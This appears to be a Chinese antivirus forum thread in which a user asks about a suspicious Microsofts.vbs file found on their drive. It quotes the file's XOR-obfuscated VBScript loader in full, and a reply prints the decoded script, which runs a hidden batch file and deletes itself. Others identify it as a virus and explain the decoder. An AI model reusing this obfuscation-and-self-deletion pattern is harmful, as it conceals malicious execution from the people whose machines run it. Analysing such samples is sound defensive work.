【求助】帮我看看这是个什么东东 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【求助】帮我看看这是个什么东东

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

【求助】帮我看看这是个什么东东

happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:	发表于： 2007-09-09 16:01 \| 只看楼主短消息资料字号：小中大 1楼【求助】帮我看看这是个什么东东今天在C:\下发现了一个Microsofts.vbs的东西，其内容为 Function fan(love) For i=1 to Len(love) Step 2 fan=fan & Chr(CLng("&H" & Mid(love,i,2)) Xor 23) Next End Function chenzi="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E" Execute fan(chenzi) [用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 附件: 文件名:780865200799155100.bmp 下载次数:356 文件类型:application/octet-stream 文件大小: 上传时间:2007-9-9 16:01:42 描述: 2007-09-15 11:54:34.610000000
happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:	分享到：

happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:	发表于： 2007-09-09 16:05 \| 只看楼主短消息资料字号：小中大 2楼图附件: 文件名:780865200799155420.bmp 下载次数:261 文件类型:application/octet-stream 文件大小: 上传时间:2007-9-9 16:05:01 描述:
happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:

jeffywang 初生襁褓狮帖子:1 注册: 2007-09-13 来自:	发表于： 2007-09-13 09:30 \| 短消息资料字号：小中大 3楼 On Error Resume Next Set Shell = CreateObject("Wscript.Shell") Shell.run("c:\microsofts.bat") set Shell=Nothing Set fso = CreateObject("Scripting.FileSystemObject") WScript.Sleep 1000 If fso.FileExists("c:\microsofts.bat") Then fso.DeleteFile("c:\microsofts.bat") fso.DeleteFile(WScript.ScriptName)
jeffywang 初生襁褓狮帖子:1 注册: 2007-09-13 来自:

happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:	发表于： 2007-09-15 11:34 \| 只看楼主短消息资料字号：小中大 4楼什么意思啊？我VBS会的还不是很多
happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:

超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:	发表于： 2007-09-15 11:54 \| 短消息资料字号：小中大 5楼那是病毒，删掉。
超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:

happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:	发表于： 2008-07-21 16:59 \| 只看楼主短消息资料字号：小中大 6楼回复：【求助】帮我看看这是个什么东东我当然知道那是病毒
happytimes 健康舞勺狮帖子:205 注册: 2006-11-07 来自:

天云一剑叱咤花甲狮帖子:2028 注册: 2008-07-06 来自:知识折旧派	发表于： 2008-07-21 19:25 \| 短消息资料字号：小中大 7楼回复: 【求助】帮我看看这是个什么东东下个VBS教程看就知道了主要是这句 Function fan(love) For i=1 to Len(love) Step 2 函数 FAN，参数为LOVE 循环1 TO4步长为2，即循环两次 fan=fan & Chr(CLng("&H" & Mid(love,i,2)) Xor 23) 从字符串读出特殊的字符并进行按2进制位操作就是解密下面那一大串的东西了看看有没有 ntdetect.exe 汰丸，你妈妈六十大寿让你回家吃饭 http://hi.baidu.com/roxiel
天云一剑叱咤花甲狮帖子:2028 注册: 2008-07-06 来自:知识折旧派

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT